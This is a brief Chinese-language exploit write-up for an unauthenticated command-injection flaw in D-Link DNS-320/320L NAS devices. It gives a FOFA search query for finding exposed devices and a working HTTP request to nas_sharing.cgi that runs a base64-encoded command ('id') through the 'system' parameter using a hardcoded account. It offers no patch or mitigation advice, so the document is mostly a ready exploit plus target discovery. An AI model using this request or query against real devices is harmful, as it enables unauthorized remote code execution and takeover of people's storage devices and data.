0x01 产品简介
D-Link DNS-320是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。
0x02 漏洞概述
D-Link DNS-320L存在命令注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,从而控制服务器。
0x03 测绘语句
fofa:body="Text:In order to access the ShareCenter"
0x04 漏洞复现
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1